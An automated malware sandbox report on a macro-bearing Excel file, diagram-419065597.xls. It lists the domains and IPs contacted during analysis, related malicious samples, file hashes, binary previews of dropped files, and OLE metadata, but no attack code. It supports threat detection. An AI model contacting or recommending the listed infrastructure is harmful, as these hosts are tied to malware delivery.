                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  108.167.180.130
                                                                                                                                                  stateoftheartacademy.com.brUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  208.91.198.131
                                                                                                                                                  dsafarm.comUnited States
                                                                                                                                                  394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412973
                                                                                                                                                  Start date:13.05.2021
                                                                                                                                                  Start time:05:22:43
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 27s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:diagram-419065597.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:32
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal76.expl.evad.winXLS@5/6@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  108.167.180.130diagram-419065597.xlsGet hashmaliciousBrowse
                                                                                                                                                    EFT Remittance Details.vbsGet hashmaliciousBrowse
                                                                                                                                                      208.91.198.131diagram-419065597.xlsGet hashmaliciousBrowse
                                                                                                                                                        240000434383.doc.jsGet hashmaliciousBrowse
                                                                                                                                                          240000434383.doc.jsGet hashmaliciousBrowse

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            dsafarm.comdiagram-419065597.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.131

                                                                                                                                                            ASN

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            PUBLIC-DOMAIN-REGISTRYUSdiagram-419065597.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            PRODUCT RANGE # 363688.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            #Ud83d#Udce0Lori's Fax VM-002.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 199.79.62.225
                                                                                                                                                            PRODUCT INQUIRY FROM PAKISTAN.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            tLes2JdtRw.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.223
                                                                                                                                                            SecuriteInfo.com.Malware.AI.4228845530.13946.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            Letter of Demand.docGet hashmaliciousBrowse
                                                                                                                                                            • 103.21.59.173
                                                                                                                                                            7b4NmGxyY2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 162.215.241.145
                                                                                                                                                            catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 199.79.62.12
                                                                                                                                                            catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 199.79.62.12
                                                                                                                                                            INV74321.exeGet hashmaliciousBrowse
                                                                                                                                                            • 119.18.54.126
                                                                                                                                                            NAVTECO_R1_10_05_2021,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 116.206.104.92
                                                                                                                                                            #10052021.exeGet hashmaliciousBrowse
                                                                                                                                                            • 116.206.104.66
                                                                                                                                                            shipping docs and BL_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            PDF.9066721066.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            Payment Advice Note from 10.05.2021 to 608760.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.199.224
                                                                                                                                                            551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.222.225.153
                                                                                                                                                            551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 162.222.225.153
                                                                                                                                                            export of document 555091.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 103.21.58.29
                                                                                                                                                            RFQ-20283H.exeGet hashmaliciousBrowse
                                                                                                                                                            • 208.91.198.143
                                                                                                                                                            UNIFIEDLAYER-AS-1USe09ca2b3_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            2a9335bd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            diagram-419065597.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            e09ca2b3_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            a46eb47f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            aabc6e16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            6f75ecf8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            2a9335bd_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            3e917917_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            73f69405_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            4ebc60e0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            eacf01bf_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            aabc6e16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            dd9d35c4_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            a46eb47f_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            3e917917_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            6f75ecf8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            eacf01bf_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            73f69405_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225
                                                                                                                                                            4ebc60e0_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                                                                                            • 162.241.209.225

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            37f463bf4616ecd445d4a1937da06e195781525.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            85095f36_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            #Ud83d#Udce0Lori's Fax VM-002.htmlGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            statistic-482095214.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131
                                                                                                                                                            DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                            • 108.167.180.130
                                                                                                                                                            • 208.91.198.131

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DF844609-1DF5-41CA-99D6-1693334E4107
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):134558
                                                                                                                                                            Entropy (8bit):5.368375143077113
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:icQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:JEQ9DQW+zPXO8
                                                                                                                                                            MD5:10BEC81A10D7319810D65FAFC9231BFA
                                                                                                                                                            SHA1:70678656035B77B6DCC5EF5516AE4DE2B2DE798E
                                                                                                                                                            SHA-256:C8B904A81B28B787047804375F196DE0877042701C23F78BC18B87C6DB74B98F
                                                                                                                                                            SHA-512:72472FE9052ACB816E4EAB512B83C10007081865F561E1FC380C8C34B162D71F053EF56A2FC661325B4BD4198DBB2BF14FF6CC94EF584B32E5CBB164B513F310
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-13T03:24:36">.. Build: 16.0.14112.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\34A10000
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):80804
                                                                                                                                                            Entropy (8bit):7.903663271072782
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:BWjYO+nfySDcn9iZtJOXAQR2KtCbuMB/yDL4zC1H4e6MZliczFP4W:E+nKSD8YZo/Uh0hh4e6OnqW
                                                                                                                                                            MD5:32686B3BAC60DCB35A8A89EF05B95CBD
                                                                                                                                                            SHA1:DC294AFD1EEACF675FA860AB795D6F0D995AE3E8
                                                                                                                                                            SHA-256:25536DD38AA544C0C827CE3D6BBC38CE21C9B2B42271BE5A92D9C891D7701D0A
                                                                                                                                                            SHA-512:118B518E37783B8304E04B8EE7DD9C192A820A9A872CD29B5D91239386E9954291F0B3FFEC07B6175A956039AF6C381F4E871DD5D6599C9F1C751A9B5D1432F5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu May 13 11:24:40 2021, atime=Thu May 13 11:24:40 2021, length=12288, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):904
                                                                                                                                                            Entropy (8bit):4.653683866962998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:8RnncXU1zpuElPCH2JgMPW7gTj+WrjAZ/2bDwHLC5Lu4t2Y+xIBjKZm:85XuMPXAZiDwG87aB6m
                                                                                                                                                            MD5:1C26548543D52B8255941F43C3060E06
                                                                                                                                                            SHA1:F3C07672FF60A5D325CAF57CC55B763940908730
                                                                                                                                                            SHA-256:91A3541B4A1C5D4A2D91517BB937784F2FC908B29B9B7414DD8210632FECE5EF
                                                                                                                                                            SHA-512:72927792D460F54B045D9D8FA0044BD8BA20B192B8D222D27C5237009AC838C189C60BC8C13F89FAB9DACE5220DB49F7FE4BD4EE0620D633BCCA44B78A1C912B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: L..................F........N....-...(..G..).#..G...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.c....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.c.....S....................^^%.h.a.r.d.z.....~.1......R.c..Desktop.h.......Ny..R.c.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......088753...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\diagram-419065597.xls.LNK
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:45 2020, mtime=Thu May 13 11:24:40 2021, atime=Thu May 13 11:24:40 2021, length=177152, window=hide
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2180
                                                                                                                                                            Entropy (8bit):4.697417291729638
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:8auMP+F0AFArJLbqDwEK7aB6myauMP+F0AFArJLbqDwEK7aB6m:81FurJPaLB6p1FurJPaLB6
                                                                                                                                                            MD5:D4DE2E7AA4A49D7B62B62B18C526E0A7
                                                                                                                                                            SHA1:16F6BEECB5F0A1464AFC65B7227796C418EB631A
                                                                                                                                                            SHA-256:841293C10AA8786407E65A2092DDC1D11637EC566BA1D396DBAF551AD8EF081E
                                                                                                                                                            SHA-512:78177ABEEA445EF6DD227BCBC0FE24347333519313942E983938774CC9AD21F92AC4449901E229ACD8424CB7C057BBD76451C67413457DAA2399EC5B002F664D
                                                                                                                                                            Malicious:true
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: L..................F.... .......:.....B..G....B..G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.c....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R.c.....S....................^^%.h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny..R.c.....Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......R.c .DIAGRA~1.XLS..\......>Qwx.R.c....h.....................@V..d.i.a.g.r.a.m.-.4.1.9.0.6.5.5.9.7...x.l.s.......[...............-.......Z...........>.S......C:\Users\user\Desktop\diagram-419065597.xls..,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.i.a.g.r.a.m.-.4.1.9.0.6.5.5.9.7...x.l.s.........:..,.LB.)...As...`.......X.......088753...........!a..%.H.VZAj...6..-.........-..!a..%.H.VZAj...6..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2
                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):116
                                                                                                                                                            Entropy (8bit):4.796517418357948
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:oyBVomMXCU7KSbZFd7KSbmMXCU7KSbv:dj6XCRS1+SPXCRSL
                                                                                                                                                            MD5:AE2FF8211BEA9FE56BEA37F8A5D9FF7D
                                                                                                                                                            SHA1:9256934A2AD18FEBE147B4F4BF1C33DE152AAAEB
                                                                                                                                                            SHA-256:D57A01102A4B742A421A9F3B31DD5C3825EE5D83C0C547C0AB8139E5C823D8EB
                                                                                                                                                            SHA-512:A367FD6BFD93B71BDC85634EA37B240FAE5F09635E36C9508A2F6D007A77D855ACB3C9E067F6D3EA83D217330AB86A52A374F5DA50D8EFBB87CA4E236AA2CACE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: Desktop.LNK=0..[xls]..diagram-419065597.xls.LNK=0..diagram-419065597.xls.LNK=0..[xls]..diagram-419065597.xls.LNK=0..
                                                                                                                                                            C:\Users\user\Desktop\75A10000
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):229119
                                                                                                                                                            Entropy (8bit):5.618633325481051
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:i7Ni6NSD8YNoDUF01aJH7RDHSjnTDPBarvvr5rArl7Nikx:T6NTLDUF6aVkx
                                                                                                                                                            MD5:5381BC973E6B3F44D131748FAC8A6CEA
                                                                                                                                                            SHA1:B99CB65A3991B22F75891EB72F06D4F58EA83E24
                                                                                                                                                            SHA-256:5507AB1ADD251F2023248A27ABCFF50E893C822CBAD12190CD0E5FBE568B6958
                                                                                                                                                            SHA-512:BF260E12E8D873D19B2E6968506925F56DD699198F0624B2A4CFB8CF127C4282607C51FD2C6CEDC83A5FBEBE070EC5A2629F8790144BB8B5A6D46C59DBF53FB2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................g..C.a.l.i.b.r.i.1................g..A.r.i.a.l.1................g..A.r.i.a.l.1................g..A.r.i.a.l.1................g..C.a.l.i.b.r.i.1...,...8........g..A.r.i.a.l.1.......8........g..A.r.i.a.l.1.......8........g..A.r.i.a.l.1.......<........g..A.r.i.a.l.1.......4........g..A.r.i.a.l.1.......4........g..A.r.i.a.l.1...h...8........g..C.a.m.b.r.i.a.1................g..C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1.......>..........A.r.i.a.l.1.......?..........A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1...............

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:22:48 2021, Security: 0
                                                                                                                                                            Entropy (8bit):3.261681103749055
                                                                                                                                                            TrID:
                                                                                                                                                            • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                            File name:diagram-419065597.xls
                                                                                                                                                            File size:375808
                                                                                                                                                            MD5:ec968745c407ee67d80d18c25abaa8d2
                                                                                                                                                            SHA1:922818d6a781b3780541837975c54baa4e7a3349
                                                                                                                                                            SHA256:431c2a2e6969ba3aa239af68c3150d86837b3e58bc80b2690b91cf39d459ac55
                                                                                                                                                            SHA512:8b8e26f86ec06bc25718036c5d94c794014f02d5d4e9ce605d25713becf43e97fdcce82636df650c66bebb930f5b32ea00f52f07470708bd7953dcd153f0b574
                                                                                                                                                            SSDEEP:3072:Q8UMKE+Y6t/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/2zfOTfFG4l+s2/7nU5BLP:vUMIt6Uqa5DPdG9uS9QLA4l+sBqO
                                                                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                            Static OLE Info

                                                                                                                                                            General

                                                                                                                                                            Document Type:OLE
                                                                                                                                                            Number of OLE Files:1

                                                                                                                                                            OLE File "diagram-419065597.xls"

                                                                                                                                                            Indicators

                                                                                                                                                            Has Summary Info:True
                                                                                                                                                            Application Name:Microsoft Excel
                                                                                                                                                            Encrypted Document:False
                                                                                                                                                            Contains Word Document Stream:False
                                                                                                                                                            Contains Workbook/Book Stream:True
                                                                                                                                                            Contains PowerPoint Document Stream:False
                                                                                                                                                            Contains Visio Document Stream:False
                                                                                                                                                            Contains ObjectPool Stream:
                                                                                                                                                            Flash Objects Count:
                                                                                                                                                            Contains VBA Macros:True

                                                                                                                                                            Summary

                                                                                                                                                            Code Page:1251
                                                                                                                                                            Author:van-van
                                                                                                                                                            Last Saved By:vi-vi
                                                                                                                                                            Create Time:2006-09-16 00:00:00
                                                                                                                                                            Last Saved Time:2021-05-12 07:22:48
                                                                                                                                                            Creating Application:Microsoft Excel
                                                                                                                                                            Security:0

                                                                                                                                                            Document Summary

                                                                                                                                                            Document Code Page:1251
                                                                                                                                                            Thumbnail Scaling Desired:False
                                                                                                                                                            Contains Dirty Links:False

                                                                                                                                                            Streams

                                                                                                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:4096
                                                                                                                                                            Entropy:0.287037498961
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                            General
                                                                                                                                                            Stream Path:\x5SummaryInformation
                                                                                                                                                            File Type:data
                                                                                                                                                            Stream Size:4096
                                                                                                                                                            Entropy:0.288480529966
                                                                                                                                                            Base64 Encoded:False
                                                                                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                            Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363297
                                                                                                                                                            General
                                                                                                                                                            Stream Path:Book
                                                                                                                                                            File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                            Stream Size:363297
